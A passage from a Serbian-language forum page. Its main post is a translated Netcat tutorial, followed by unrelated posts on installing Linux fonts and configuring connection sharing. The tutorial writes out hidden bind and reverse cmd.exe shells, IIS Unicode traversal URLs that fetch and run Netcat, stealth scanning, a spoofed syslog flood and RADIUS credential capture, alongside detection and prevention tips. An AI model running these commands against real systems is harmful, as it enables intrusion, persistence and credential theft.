-z Ukoliko Vas interesuje koji portovi su otvoreni, verovatno biste trebali koristiti nmap Ali, ova opcija nalaze Netcat-u da salje samo onoliko podataka da bi otkrio koji portovi u Vasem naznacenom opsegu stvarno imaju nesto sto ih osluskuje.
Sada, kada imate predstavu o mogucnostima Netcat-a, pogledajte neke realne prakticne primere iz upotrebe ovog alata.


 101 upotreba Netcat-a
Ljudi tvrde da su otkrili stotine nacina za upotrebu Netcat-a u dnevnim poslovima. Neki od ovih zadataka su slicni, razlikujuci se vrlo malo. Pokusali smo da Vam predstavimo nekoliko koji, kao i Netcat, su opsti i pokrivaju najsire podrucje. Evo onih primera za koje smatramo da su najvazniji.

Pribavijanje udaljenog pristupa komandnom okruzenju
Zar ne biste zeleli da mozete da dobijete DOS odzivnu liniju od kuce, bilo gde u svetu? Pokretanjem komande nc. exe -1 - p 4455 - e cmd.exe iz DOS odzivne linije na NT ili Windows 2000 sistemu, svako ko se telnetom poveze na taj sistem preko porta 4455, naici ce na DOS komandno okruzenje cak i bez potrebe da su uloguje.

[root@originx /root]# telnet 192.168.1.101 4455 Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '"]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:>
Connection closed by foreign host.
[root@originix /root]#
Vrlo jednostavno, zar ne? Ali je takode i dosta zastrasujuce. Bez mnogo truda, obezbedili ste odzivnu liniju na sistemu. Medutim, na Windows NT i 2000 sistemima, imacete iste pristupe i priviliegije kao i korisnik koji je pokrenuo Netcat. Upad na ovaj nacin u Windows 95 i 98 (koristeci command.com umesto cmd.exe) ce Vam dati kontrolu nad celim sistemom. Ovo pokazuje kako Netcat moze biti opasan u pogresnim rukama.

Hajde da malo razradimo ovu komandu. Imajte na umu da ce Netcat raditi unutar DOS prozora koji inicajlno pokrenut. Ovo znaci da kontrolni DOS prozor treba da ostane otvoren dok Netcat radi. Koristeci -d opciju da ga odvojite od komandnog prozora treba da omoguci Netcat-u da nastavi sa radom cak i posle zatvaranja komandnog prozora.

C:>nc.exe -1 -p 4455 -d -e cmd.exe
Ovo bolje zavrsava posao skrivanja Netcat bekdora. Medutim, ako se neko telnetom poveze na port 4455, cim pre taj korisnik okonca konekciju, Netcat ce po standardnoj podesenosti misliti da je zavrsio i zaustavice osluskivanje. Koristite - L opciju umesto -1 da biste mu nalozili da osluskuje jace (nastavi da osluskujes i ponovo pocni sa istom komandnom linijom posle zavrsetka pve konverzacije).

/C:>nc.exe -p 4455 -d -L -e cmd.exe
Ovo moze omoguciti hakeru povratak u sistem dok sistem administrator ne uoci bekdor videvsi pokrenuti nc.exe u task menadzeru. Haker moze ovo imati na umu i preimenovati nc.exe u nesto drugo.

C:>move nc.exe c:WindowsSystem32Driversupdate.exe
C:>WindowsSystem32Driversupdate.exe -p 4455 -d -L -e cmd.exe

Sistem administratoru moze promaci nesto bezopasno kao update.exe-sto moze biti bilo sta. Haker isto tako moze sakriti i komandnu liniju. Jos jedna osobina Netcat-a je da ako ga pokrenete bez komandne linije on ce sam zatraziti opcije komandne linije na prvoj linije standardnog ulaza:

C:>WindowsSystem32Driversupdate.exe
Cmd line: -1 -p 4455 -d -L -e cmd.exe
C:>

Sada, ako sistem administrator pokrene poverljivu komandu netstat -a -n u DOS promptu, primetice da je nesto pokrenuto na dosta cudnom portu, telnetom ce povezati na taj port i otkriti trik. Medutim, Windows koristi nekoliko slucajno odabranih portova za razlicite razloge pa netstat-ov izlaz moze oduzeti dragoceno vreme za analizu, narocito na sistemima sa puno aktivnosti.
Hakeri mogu probati drugaciji pristup. Ako se infiltriraju na Citrix server, na primer, kojem pristupaju nekoliko korisnika koji surfuju Web-om, treba ocekivati dosta DNS (Domain Name System) zahteva i Web konekcija. Pokretanje netstat -a -n ce otkriti puno odlazecih TCP konekcija na port 80. Umesto da pokrenete Netcat u prislusnom modu na sistemu i cekate na konekcije, Netcat moze proslediti ulaz/izlaz cmd.exe programa drugoj pokrenutoj kopiji Netcat-a koja osluskuje na udaljenom sistemu na portu 80. Na svom kraju, haker treba da pokrene:

root@originix /root]# nc -1 -p 80
Sa Windows sistema haker moze pametno "sakriti" Netcat ponovo, i proslediti sledece komande:
C:>mkdir C:WindowsSystem32Driversq
C:>move nc.exe C:WindowsSystem32Driversqiexplore.exe
C:>cd WindowsSystem32Driversq
C:WINDOWSSystem32DRIVERSq>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
C:WindowsSystem32DRIVERSq>
Sada bi prisluskujuci Netcat trebao podicî komandno okruzenje sa Windows masine. Ovo moze zavrsiti bolji posao sakrivanja bekdora od sistem administratora. Na prvi pogled, konekcije ce izgledati bas kao Internet Explorer koji stvara tipicne HTTP konekcije. Jedina mana za hakera je to sto posle zatvaranja komandnog okruzenja, ne postoji nacin da ga ponovo pokrenete na Windows strani.
Postoji nekoliko nacina na koje sistem administrator moze otkriti infiltraciju prljavog Netcat-a:

-Koristecï alat za pretragu fajlova u Windows-u i trazeci sve fajlove koji sadrze tekst ,listen mode" ili "inbound connects". Svi izvrsni fajlovi koji se pojave mogu biti Netcat.

-Proveriti task menadzer za bilo koji prljavi cmd.exe fajl. Ukoliko haker nije preimenovao cmd.exe, mozete ga takode otkriti dok koristi udaljeno komandno okruzenje jet ce cmd.exe biti pokrenut iz razloga koji je Vama nepoznat.

-Koristeci netstat komand da bi video koji se portovi trenutno koriste i koje aplikacije ih koriste. Inace, budite oprezni sa netstatom. Netstat moze lako biti zamenjen sa "trojan" verzijom programa koja je specijalno napravljena da bi haker prikrio odredenu aktivnost. Takode, netstat nekada nece prijaviti osluskujuci TCP soket dok nesto nije povezano na njega.
Upravo ste videli dva razlicita nacina da dobijete udaljeno komandno okruzenje na Windows sistemu. Ocigledno, neki drugi faktori koji mogu da uticu na uspeh sa obe metode ukljucuju srednje zastitne barijere, port filtere ili proxy servere koji zapravo filtriraju HTTP zaglavlja (samo da imenujemo nekoliko).
Posebno ova upotreba Netcata je bila pokretacka snaga nekih popularnih exploita IIS-a (Internet Informatio Server) 4.0 Microsoft Data Access Components (MDAC) i Unicode osetljivosti. Nekoliko varijacija postoji, ali u svim slucajevima exploiti koriste ove slabosti, koje omugacavaju bilo kome da komande na sistemu kao IIS korisniku koristeci specijalno kreirane URL-ove. Ovi exploiti mogu iskoristiti program kaosto je Trivial File Transfer Protocol (TFTP) ako je instaliran, prebaciti nc.exe sa udaljenog sistema na kome je pokrenut TFTP server, pokrenuti jednu od bekdor komandi. Evo URL-a u pokusaju da iskoristi TFTP za preuzimanje Netcat-a sa udaljene lokacije koristeci exploit Unicode osetljivosti:

Kod:
http://10.10.0.1/scripts/../%c1%pc/../winnt/system32/cmd.exe?/c+tftp%20 i%20originx&20GET%20update.exe

Ukoliko je uspesna, ova komanda ce efektivno smestiti Netcat na 10.10.0.1 u Interpub poddirektorijum direktorijuma Scripts kao update.exe. Haker onda moze pokrenuti Netcat koristeci drugi URL:

Kod:
http://10.10.0.1/scripts/../%ci/pc/../inetpub/scripts/update.exe?-l%20-d%20L%20-p%20443%20-e%20cmd.exe

Povezivanje telnetom na sistem preko porta 443 treba da obezbedi komandni prompt. Ovo je efektan i jednostavan napad i cak moze biti izvrsen skriptom i automatizovan. Medutim, ovaj pristup ostavlja tragove iza sebe. Pre svega, svi URL koji su korisceni bice smesteni u IIS logovima. Pretrazivanjem IIS logova za tftp ce otkriti da li je neko pokusavao ovaj napad. Takode, vecina aktuelnih IDS verzija ce traziti URL-ove formatirane na ovaj nacin (t.j. URL sadrzi cmd.exe ili specijalne Unicode karaktere). Postoji nekoliko nacina kojima mozete izvrsiti prevenciju napada ovog tipa.
-Obezbedite da IIS koristi najnoviji sigurnosni paket.
-Blokirajte odlazece konekcije sa Vaseg web servera na mreznoj barijeri (firewall). U vecmi slucajeva Vas web server ne bi trebao da inicira konekcije ka ostatku sveta. Cak iako je IIS osetljiv, TFTP ce propasti jer nece biti u mogucnosti da se poveze sa TFTP serverom napadaca.

Pritajeno skeniranje portova
Iz razloga sto Netcat moze da pregovara sa opsegom portova, dosta ocigledna primena bi bila kao port skener. Vasa prva ideja bi bila da Netcat povezete sa mnostvo portova na ciljnom hostu:

[root@originx nc]# ./nc target 20-80
Ali, ovo nece raditi. Upamtite da Netcat nije specificno port skener. U ovoj situaciji, Netcat bi poceo kod porta 80 i pokusava TCP konekcije dok nesto ne odgovori. Cim dobije odgovor, Netcat bi cekao na standardni ulaz pre nego sto nastavi. Ovo nije ono sto nam treba.
Resenje je -z opcija. Ova opcija nalaze Netcat-u da salje minimalnu kolicinu podataka da bi dobila odgovor s otvorenog porta. Kada se koristi - z mode, nemate mogucnost opcije prenosa bilo kakvog ulaza ka Netcat-u (pa i sama opcija glasi "Nula I/O mod" , nula-eng. zero i odatle -z), a takode necete videti ni izlaz. Posto Vam -v opcija uvek daje detalje o konekciji koje Netcat pravi, mozete je koristiti da vidite rezultat skeniranja portova. Bez nje...pa... necete videti nista kao sto mozete primetiti ovde:

[root@originix nc]# ./nc -z 192.168.1.100 20-80
[root@originix nc]# ./nc -v -z 192.168.1.100 20-80
originix [192.168.1.100] 80 (www) open
originix [192.168.1.100] 23 (telnet)
open originix [192.168.1.100] 22 (ssh) open
originix [192.168.1.100] 21 (ftp) open
[root@originix nc]#
Posle upotrebe -v opcije, mozete videti nesto sumnjivo izmedu portova 20 i 80. Kako ovo izgleda u syslog-u?

Feb 12 03:50:23 originix sshd[21690]: Did not recive ident string from 192.168.1.105.
Feb 12 03:50:23 originix telnetd[21689]: ttloop: read: Broken pipe Feb 12 03:50:23 originix ftpd[21691]: FTP session closed

Primeticete kako su se svi dogadaji dogodili u isto vreme i sa inkrementima protes ID-a (21689 do 21691). Zamislite da ste skenirali sirok opseg portova. Krajnji ishod bi bio dosta veliki trag. A neki servisi, cak su i toliko drski da odaju IP adresu skenera.
Cak iako skenirate portove na kojima nista nije aktivno (i zbog toga ne zavrsite u hostovom syslog-u), vecina mreza poseduje sistem detekcije upada koji ce odmah oznaciti ovaj oblik ponasanja i privuci paznju administratora. Neke aplikacije mreznih barijera ce automatski blokirati IP adresu sa koje prime previse konekcija u kratkom vremenskom periodu.
Netcat omogucava nacine da ucinite skeniranje nesto diskretnijim. Mozete koristiti - i opciju da namestite interval izmedu prenosa podataka. Duze ce trajati dobijanje informacija, ali su vece sanse da skeniranje promakne radaru. Upotreba - r opcije da izmesate redosled po kome Netcat skenira portove ce takode pomoci da skeniranje manje ili na skeniranje portova:

./nc -v -z -r -i 42 192.168.1.00 20-80
Ovim kazete Netcat-u da sucajno izabere portove izmedu 20 i 80 na 192.168.1.100 i pokusa da se poveze na njih svakih 42 sekunde. Ovo ce definitivno promaci bilo kojoj automatizovanoj odbrani, ali ce dokaz skeniranje jos uvek biti na logovima cilja; bice samo rasejaniji.
Mozete raditi isti nacin prikrivenog skeniranja portova koristeci i UDP. Jednostavno dodajte -u komandnoj liniji za pregled UDP umesto TCP portova.

Netcat nije najsofisticiraniji alat za upotrebu u port skeniranju. Zato sto se moze koristiti za mnoge opste namene umesto da izvrsava jedan zadatak izuzetno dobro, mozda bi bilo bolje da koristite port skener koji je specijalno napisan za tu svrhu.


Identifikujte se: servisi prosipaju svoje utrobe
Posle upotrebe Netcat-a ili posvecenog port-skener alata kao sto je nmap da biste utvrdili koji portovi su otvoreni na sistemu, mozda biste zeleli da budete u mogucnosti da dobijete jos informacija o tim portovima. To obicno mozete postici konektovanjem na port; servis ce odmah izbaciti broj verzije, datum stvaranja i mozda i operativnog sistema na kome lezi sistem. Stoga, trebali biste biti u mogucnosti da koristite Netcat za skeniranje odredenog opsega portova i formiranja izvestaja o ovim servisima.
Imajte na umu, mada, da biste automatizovali Netcat, morate obezbediti ulaz za komandnu liniju kako ne bi bio blokiran cekajuci na standardan unos od korisnika. Ukoliko prosto pokrenete: nc 192.168.1.100 20-80, necete otkriti mnogo, jer ce se blokirati na prvoj konekciji (verovatno web server koji slusa port 80) i onda ce cekati na Vasu reakciju. Zato morate da smislite nesto da bi ste odgovorili na sve ove servise kako bi ih ubedili da nam kazu nesto vise o sebi. Kako ispada, govoreci servisima da prekinu (eng. QUIT) stvarno ih dovodi do zabune, i u procesu oni ce otvoriti svoje duse.
Hajde da probamo protiv portova 21 (FTP), 22 (SSH-Secure Shell-obezbedi komandno okruzenje) i porta 80 (HTTP) i videti sta ce nam serveri reci.

[root@originix nc]# echo QUIT I ./nc -v 192.168.1.100 21 22 80
originix [192.168.1.1001 21 (ftp) open
220 originix FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
221 Goodbye.
originix [192.168.1.100] 22 (ssh) open SSH-2.0-OpenSSH 2.3.Opl Protocol mismatch.
originix [192.168.1.100] 80 (www) open
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE> </HEAD><BODY>
<H1>Method Not Implemented</H1>
QUIT to /index.html not supported.<P> Invalid method in request QUIT<P> <HR>
<ADRESS>Apache/1.3.14 Server at 127.0.0.1 Port 80</ADRESS> </BODY></HTML>
[root@originix nc]#


Izlaz nije lep, ali sada znamo verzije ova tri servisa. Haker moze koristiti ovo da potrazi starije verzije servisa koji su osetljivi na exploite (http: //www.securityfocus.com/ je odlicno mesto gde mozete nacî informacije o osetljivim verzijama servisa). Haker koji pronade posebno interesantan port mogao bi da dobije jos i vise informacija fokusirajuci se na te servise i pokusavajuci da govori njihovim jezikom.
Hajde da se fokusiramo na Apache Web server. QUIT nije komanda koju taj HTTP razume. Pokusajmo da mu kazemo nesto sto bi mogao shvatiti.
[root@originix nc]# ./nc -v 192.168.1.100 80
originix [192.168.1.100] 80 (www) open GET / HTTP
HTTP/1.1 200 OK
Date: Tue, 12 Feb 2002 09:43:07 GMT
Server: Apache/1.3.14 (Unix) (Red-Hat/Linux)
Last-Modified: Sat, 05 Aug 2000 04:39:51GMT
ETag: "3x107-24-398b9a97" Accept-Ranges: bytes
Content-Length: 36 Connection: close
Content-Type: text/html
I dont think you meant go here.
[root@originix nc]#

Sto je ovo fino! Razmenili smo malo osnovnog HTTP-a (postavljajuci GET / HTTP komandu i onda pritiskanjem ENTER dva puta) i Apache je odgovorio. Omogucio nam je da vidimo osnovnu index.html stranu sa svim HTTP zaglavljima netaknutim i bez interpretacija na nivou aplikacija sto bi inace Web pretrazivac ucinio. A Server zaglavlje nam govori ne samo da radi Apache na Linux sistemu, nego da radi na RedHat Linux sistemu.

Komunikacija sa UDP uslugama
Pomenuli smo kako je ponekad Netcat predviden kao nista vise do jedan slavljeni telnet klijent. Mada je tacno da vecina stvari koje Netcat radi (kao sto je razmena HTTP-a direktno sa serverom) moze biti zavrsena koristeci telnet, telnet poseduje puno limitacija koje Netcat nema. Pre svega, telnet ne moze vrsiti dobro transfer binarnih podataka. Neke od podataka ne moze interpretirati kao telnet opcije. Zato, telnet Vam ne nudi stvarno transportni sloj cistih podataka. Drugo, telnet zatvara konekciju cim njegov ulaz dostigne EOF. Netcat ce ostati otvoren dok se mrezna strana ne zatvori, sto je korisno za upotrebu skripta u inicijaciji konekcija koje ocekuju velike kolicine primljenih podataka kada salju samo jednu liniju ulaza. Medutim, verovatno najbolja osobina Netcat-a koju ima nad telnet-om je da Netcat govori UDP.
Sanse su da ste pokrenuli syslog demon na Vasem UNIX sistemu-zar ne? Ako je Vas syslog konfigurisan da prima poruke sa drugih hostova na Vasoj mrezi, videcete nesto na UDP portu 514 kada postavite: netstat -a -n komandu. (Ukoliko ne, pogledajte syslogd man stranu o tome kako da pokrenete syslog u mreznom modu). Jedan od nacina da utvrdite da li syslog prihvata UDP pakete je da pokusate ga da pratite i onda vidite da li se nesto pojavljuje u logu:

[root@originix nc]# echo "<0>I can speak syslog" | ./nc -u 192.168.1.100 514

Message from syslogd@originix at Tue Feb 12 06:07:48 2002 ... originix I can speak syslog
punt!
[root@originix nc]#
<0> znaci najvisi syslog nivo, kern.emerg, naznacavajuci da bi ova poruka trebala biti napisana negde na sistemu. (pogledajte Vas /etc/syslog.conf fajlda biste znali tacno gde). A ako proverite kernel log, trebali biste videti nesto otprilike ovako:
Feb 12 06:00:22 originix kernel: Symbols match kernel version 2.2.12. Feb 12 06:00:22 originix kernel: Loaded 18 symbols from 5 modules. Feb 12 06:00:22 originix I can speak syslog

Voila. Ovo je dobar nacin da utvrdite da li udaljeni UDP serveri rade. I ako neki radi sa neobezbedenim syslog-om, ostavlja sebe otvorenim za vrlo prost napad koji moze napuniti prostor na disku, pojesti propusni opseg mreze, prebukirati CPU vreme itd.

[root@originix nc]# yes "<20>blahblahblah" 1 nc -s 10.0.0.1 - u targethost 514
Yes komanda izbacuje string (obezbeden u komandnoj liniji) ponovo i ponovo sve dok se proces ne unisti. Ovo ce poplaviti syslog demon na ciljnom hostu sa "blahblahblah" porukama. Napadac cak moze koristiti i laznu IP adresu (-s 10.0.0.1) jer su odgovori syslog demona
beznacajni.

Smestite prijatelju: IP varanje
IP varanje je obavijeno velom misterije. Cesto cete cuti: "Kako znamo da je to stvarno njihova adresa?" Sta ukoliko varaju?" Zapravo, moze biti veoma tesko varati IP adresu. Mozda bi trebali da refraziramo: Varanje IP adrese je lako. Mrezne barijere koje rade laziranje ili prevod mrezne adrese (NAT) varaju IP adresu svakodnevno. Ovi uredaji mogu uzeti paket od interne IP adrese, promene izvornu IP adresu u paketu svojom IP adresom, posalju ga na mrezu i poniste modifikaciju kada prime podatke nazad sa destinacije. Pa, promena sadrzaja izvorne IP adrese u IP paketu je lako. Ono sto je tesko je primanje bilo kakvih podataka nazad ka Vasoj laznoj IP adresi.
Netcat nudi - s opciju, koja Vam omogucava da specificirate IP adresu koju god zelite. Neko moze zapoceti skeniranje porta protiv nekoga i iskoristiti - s opciju da bi naveo metu da pomisli da je skenira Microsoft ili Federal Bureau of Investigation (FBI). Problem se javlja, inace, kada zelite da se odgovor sa skeniranja portova sa skrivenom IP adresom vrate Vasoj realnoj IP adresi. Zato sto je ciljni domen primio zahtev za konekciju od Microsoft-a, na primer, pokusace da posalje zahvalnicu Microsoft-ovom IP-u. IP ce, naravno, bez ikakve ideje o cemu ciljani host govori poslati reset. Kako vratiti informacije realnom IP-u bez mogucnosti otkrivanja?
Osim da zapravo hakujemo masinu kojoj treba smestiti, jedina druga moguca opcija je da koristimo rutiranje izvora. Rutiranje izvora omogucava mreznoj aplikaciji da naznaci rutu kojom bi zelela da dode do destinacije.
Postoje dva tipa rutiranja izvora: striktno i labavo. Striktno rutiranje izvora znaci da paket mora naznaciti svaki skok u ruti do destinacionog domena. Neki ruteri i mrezni uredaji jos uvek dozvoljavaju striktno rutiranje izvora, ali samo nekoliko bi jos uvek dozvolilo labavo rutiranje izvora. Labavo rutiranje izvora govori ruteru i mreznim uredajima da ruteri mogu da urade vecinu rutiranja do destinacionog domena, ali takode govori da paket mora proci kroz naznaceni set rutera na svom putu do destinacije. Ovo je opasno, jer moze omoguciti hakeru da posalje paket kroz masinu koju kontrolise (mozda masinu koja vrsi promenu IP adrese dolazeceg paketa na adresu nekog drugog). Kada se odgovor vrati, ponovo ce imati istu opciju labavog rutiranja izvora i vratice se nazad kroz nestasnu masinu (koja onda moze vratiti "pravu" IP adresu). Ovom metodom, rutiranje izvora moze omoguciti napadacu da izvrsi obmanu IP adrese i ipak dobije odgovor nazad. Vecina rutera ignorise opcije rutiranja izvora, ah ne svi.
Netcatova-g opcija Vam omogucava da obezbedite do osam skokova koje paket mora proci pre nego sto stigne na destinaciju. Na primer: nc -g 10.10.4.5 -g 10.10.5.8 -g 10.10.7.4 -g 10.10. 9.9 10.10.9.50 23 ce kontaktirati telnet port na 10.10.9.50 ali ukoliko je opcija rutiranja izvora omogucena na medu ruterima, saobracaj ce biti primoran da prode preko ove cetiri lokacije pre nego sto stigne na destinaciju. Da smo pokusali: nc -g 10.10.4.5 -g 10.10.5.8 -g 10.10.7.4 -g 10.10.9.9 -G 12 10.10.9.50 23, specificiramo pokazivac skoka koriscenjem -G opcije u ovoj komandi. -G ce postaviti pokazivac skoka na n-ti bajt (u ovom slucaju dvanesti), i zato sto su IP adrese 4 bajta svaka, pokazivac skoka ce poceti na 10.10.9.50, saobracaj ce morati da ide jedino preko poslednje dve masine (jer smo, prema pokazivacu skoka, vec bili na prve dve). Na povratnom putu, medutim, paket ce proci kroz sve ove cetiri masine.
Ukoliko Vasi ruteri i mrezni uredaji nisu podeseni da ignorisu opciju rutiranja izvornog IP-a, na srecu, sistem za detekciju upada pazi na njih . Svako ko pokrene analizer saobracaja kao sto je Ethereal, mogao bi sa lakocom da uoci varanje rutiranjem izvora, jer ce deo opcija IP zaglavlja biti veci od normalnog i IP adresa u rut listi ce biti jasno vidljiva koriscenjem ASCII dekodera. Ukoliko je to vazno sistem administratorima, uci ce u trag vlasniku svake IP adrese u listi u pokusaju da nadu krivca. Pa, da sumiramo, smestanje nekom drugom, za lose ponasanje na mrezi je lako. Stvarno pretvaranje da ste neko drugi je, ipak, nesto teze. U oba slucaja Netcat Vam moze pomoci.

Otimanje servisa
Ulogujte se na Vas omiljeni sistem i pokrenite komandu netstat -a -n. Potrazite pri vrhu izlaza stavke koje osluskuju. Trebali biste videti nesto ovako:
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0. *.6000 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp4 0 0 *.23 *.* LISTEN
tcp4 0 0 *.21 *.* LISTEN
tcp4 0 0 *.512 *.* LISTEN
tcp4 0 0 *.513 *.* LISTEN
tcp4 0 0 *.514 *.* LISTEN
Poslednja tri r-servisa (rlogin, rexec, itd.), sto bi bilo odlicno otkrice za bilo kog hakera jer su veoma nebezbedni. Takode mozete videti da telnet, FTP, X Windows, Web i SSH jos uvek rade. Ali, sta jos vredi primetiti? Primecujete kako svaka stavka navodi * za lokalnu adresu? Ovo znaci da se svi ovi servisi nisu vezali za specificnu IP adresu. Pa sta? Kako ispada, mnoge IP klijent implementacije de prvo pokusati da kontaktiraju servis osluskujuci specificne IP adrese pre kontaktiranja servisa osluskivanjem na svim IP adresama. Probajte ovu komandu:

[root@originix nc]# ./nc -1 -v -s 192.168.1.102 -p 6000
Sada jos jednom pokrenite Netstat. Trebali biste videti ovo:
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 192.168.1.102.6000 *.* LISTEN
tcp4 0 0 *.6000 *.* LISTEN
Pogledajte Vi to! Sada slusate pre X servera. Da ste imali glavni pristup na sistemu, mogli biste da osluskujete portove nize od 1024 i otimate stvari kao sto je telnet, Web, i druge izvore. Ali puno interesantnih autentifikacija od trecih lica, deljenje fajlova i druge aplikacije koriste vise portove. Regularni korisnik na Vasem sistemu (nazvacemo ga "joeuser") moze, na primer oteti RADIUS server (koji uglavnom slusa na portu 1645 ili 1812 UDP) i pokrenuti Netcat komandu sa -o opcijom da bi dobio heksadecimalni oblik svih pokusaja logova. On je uhvatio samo odredenu kolicinu korisnickih imena i sifara bez cak i potrebe za root pristupom na sistemu. Naravno, nece potrajati dugo dok se korisnici ne pozale da servis ne odgovara i aktivnost joeusera ce biti otkrivena. Ali ako bar malo zna nesto o servisu koji otima, mogao bi da prevari servis (kao laziranjem odgovora) ili cak prode kroz servis nekog drugog.

[root@originix nc]# ./nc -1 -u -s 192.168.1.100 -p 1812 -e nc to_radius
Nc to_radius je skript komandnog okruienja i izgleda ovako:
#! /bin/sh
DATE='date "+%Y-%m-%d %H.%M.%S
/usr/bin/nc -o hexlog-$DATE slave-radius 1812

slave-radius je ime hosta sekundarnog RADIUS servera na mrezi. Postavljajuci osluskujuci
Netcat u petlju tako da se ponovo pokrene na svaku konekciju, ova tehnika bi teoretski trebala da omoguci joeuseru da uhvati sve tipove login informacija (svaka sesija u pojedinacnom fajlu)
istovremeno onemogucavajuci bilo koga da u tom trenutku dode do saznanja da nesto nije kako treba. Jednostavno ce snimiti informacije dok ih usmerava ka bekup RADIUS serveru. Ovo bi bilo
dosta tesko uciniti da radi konzistentno, ali je u opsegu moguceg.

Proksiji i releji
Mozete koristiti istu tehniku primenjenu u prethodnom delu da biste kreirali Netcat proksije i releje. Netcat koji osluskuje moze biti upotrebljen da zapocne drugu Netcat konekciju ka razlicitom hostu ili portu, kreirajuci relej.
Upotreba ove osobine zahteva nesto poznavanja skripta. Iz razloga sto Netcat-ova -e opcija prihvata samo jednu komandu (bez argumnata komandne linije), morate da spakujete bilo koju ili sve komande koje zelite da pokrenete u skript. Mozete se i poigrati s ovim, kreirajuci relej koji premoscuje nekoliko razlicitih domena. Tehnika moze biti iskoriscena za kreiranje kompleksnog "tunela", omogucavajuci hakeru da oteza sistem administratoru da mu ude u trag.
Ova mogucnost moze biti koriscena i u dobre svrhe, naravno. Na primer, relej osobina moze dozvoliti Netcat-u da vrsi funkciju proksija web stranama. Postavite ga da osluskuje na portu 80 na drugom sistemu omogucite mu da stvara sve Vase Web konekcije (uz pomoc skripta) i prosledite ih.

Cryptcat
Cryptcat je upravo ono sto i pise u nazivu: Netcat sa enkripcijom. Sada mozete enkriptovati kanal podataka, proksi ili relej. Hakeri mogu drzati Netcat saobracaj sakriven, tako da administratori njuskala moraju uraditi vise od prostog pregleda mreze da bi saznali ono sta ste naumili.
Cryptcat koristi poboljsanu verziju Twofish enkripcije. Argumenti komandne linije su isti. Ocigledno Cryptcat nije strahovito koristan za port skeniranje i komunikaciju sa drugim servisima koji ne koriste istu enkripciju kao i sam Cryptcat. Ali ako Vasa upoteba Netcat-a ukljucuje kopiju Netcat-a koja je pokrenuta negde u prislusnom modu i odvojenu kopiju Netcat-a koja se povezuje na onu prvu, Cryptcat Vam daje dodatne pogodnosti osiguravanja konekcije.
Cryptcat mozete skinuti ovako.

Izvor: Tim 1o1
« Poslednja izmena: 24. Mar 2007, 13:07:47 od Crowz »
IP sačuvana
social share
Pogledaj profil WWW
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Supervizor foruma
Legenda foruma


Violence solves everything

Zodijak Aquarius
Pol Muškarac
Poruke 33826
Zastava Srbija
OS
Windows XP
Browser
Mozilla K-Meleon 1.02
mob
LG Nexus 5
Instalacija Fontova




1. Instalacija fontova

Pre svega, treba instalirati True Type Fontove (TTF). Za ovo je potrebno sledece:

a) Sami ttf fontovi download

b) Otpakujte same fontove u /usr/X11R6/lib/X11/fonts/ttf/ (koji ste naravno kreirali).

Napomena: Više ne morate da se patite sa ttmkfdir i ostalim peripetijama, vec su vec spakovani svi potrebni fontovi.

c) Editujte fajl /etc/X11/XF86Config i proverite u sekciji "moduli" da li je ukljuceno ucitavanje type1 i truetype fontova ( sa load "type1" i load "truetype" ).

Dalje, u sekciji "files" dodajte liniju FontPath "/usr/X11R6/lib/X11/fonts/ttf/"

Restartujete X server i novi fontovi su spremni !

Sada je potrebno naznaciti grafickom okruženju i aplikacijama da koriste te fontove. Od ovog trenutka sva prica važi za KDE, analogno ce te se snaci i u gnome-u.

Pokrenite kde control center, sekcija fonts. Tu specifirajte zeljeni font i velicinu, bold, italic i ostalo. Moja preporuka - vedrana. Takode, ukoliko neka aplikacija ne koristi doticni font, onda specijalno u podešavanjima te aplikacije podesite korišcenje tog font-a.

I naravno, najvažnija stvar vezano za fontove: sad bi browser-i trebali lepo da prikazuju web strane, bez zbijenih, ružnih slova i slicno. Medutim, ja sam uradio još jedno malo tvikovanje i izgleda super, bar kod mene. U mozilli sam naznacio u appearance > fonts korišcenje vedrana fonta za sve žive fontove (western, unicode ...) i naznacio da "minimum font size" ne padne ispod 13, dakle 13. Ovim se obezbeduje izbegavanje malih fontova i ckiljenje.

Ukratko, to je što se tice fontova, nema neke velike nauke ...
IP sačuvana
social share
Pogledaj profil WWW
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Supervizor foruma
Legenda foruma


Violence solves everything

Zodijak Aquarius
Pol Muškarac
Poruke 33826
Zastava Srbija
OS
Windows XP
Browser
Mozilla K-Meleon 1.02
mob
LG Nexus 5
Deljenje konekcije na Linuxu






Sa demokratizacijom brze konekcije sve vise i vise osoba zeli da podeli ovu konekciju sa svim masinama koje poseduje.

1.1. Tolopologija mreze

Jedan kompjuter server,isto nazvan prolaz(gateway),je konektovan i na internet a i na unutrasnjoj mrezi.Kompjuteri klijenti,su oni koji nisu direktno povezani na internet vec koriste prolaz(server) za pristupanje internetu.



2.Konfiguracija Kernela

Ispred svega morate da izvrsite konfiguraciju vaseg kernela i activirate firewall isto i opcije da nas prolaz(premoscavanje) moze poslati pakete.Vi mozete da skinete potrebne pakete sa http://www.kernel.org.

Ako vec posedujete neku distribuciju sa sistemom paketa (RedHat,Debian,Mandrake)ove opcije su mozda vec omogucene u modulima,znaci da nije potrebno da izvrsite rekompilaciju kernela.

2.1 Kernel 2.4

#make menuconfig

Networking options --->
  • Network packet filtering
    IP : Netfilter Configuration --->
    <M> Connection tracking
    <M> IP tales support
    <M> limit match support
    <M> IP range match support
    <M> Packet type match support
    <M> Multiple port match support
    <M> Connection state match support
    <M> Connection tracking match support
    <M> Full NAT
    <M> MASQUERADE target support
    # make dep clean bzlmage modules modules_install

    Ne zaboravite da konfiguriste vas botloader.



    2.2 Kernel 2.6

    #make menuconfig
    Device Drivers--->
    Networking Support --->
  • Networking Support
    Networking options --->
    ...
  • Network packet filtering --->
    IP : Netfilter Configuration --->
    <M> Connection tracking
    <M> IP tales support
    <M> limit match support
    <M> IP range match support
    <M>Packet type match support
    <M> Multiple port match~support
